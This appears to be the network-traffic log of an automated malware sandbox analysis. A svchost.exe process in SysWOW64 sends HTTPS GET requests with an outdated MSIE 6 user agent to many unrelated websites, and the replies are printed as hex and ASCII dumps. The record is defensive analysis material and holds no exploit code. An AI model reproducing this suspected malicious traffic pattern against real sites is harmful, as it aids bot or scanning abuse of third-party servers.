                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5568INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                  Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5584INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5600INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                  Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  27192.168.2.421182185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5610OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5610INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:32 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5611INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  28192.168.2.4211915.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5611OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:32 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                  Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 53069
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5612INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5628INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                  Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5644INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                  Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5660INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                  Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  29192.168.2.421205104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5664OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: orlyhotel.com
                                                                                                                                                                                                                                                  Cookie: django_language=en
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5664INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Expires: Thu, 27 Jul 2023 19:42:19 GMT
                                                                                                                                                                                                                                                  Content-Language: en
                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jul 2023 19:42:19 GMT
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VnNvZIZ40UKahb8N7WLpZOBGtqyhaH9A4BXrbRZ%2BSpj7OCDiPdwMLMd%2B94EM6J4%2FHR5dkUSv0jq23D%2F%2Fcey8e51Hgjz9zocNjNVx7z8DPsJaKHo9%2FixmcfzgyGLsYdMQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76f517cb33675-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5665INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5665INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  3192.168.2.45014175.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC75OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: ldh.la.gov
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC75INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:35 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 1346
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC75INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  30192.168.2.42121335.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5664OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: flamingorecordings.com
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5665INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 75193
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  ETag: "61e91823-125b9"
                                                                                                                                                                                                                                                  Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                  X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5665INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5681INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                  Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5697INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5713INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                  Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5729INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                  Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
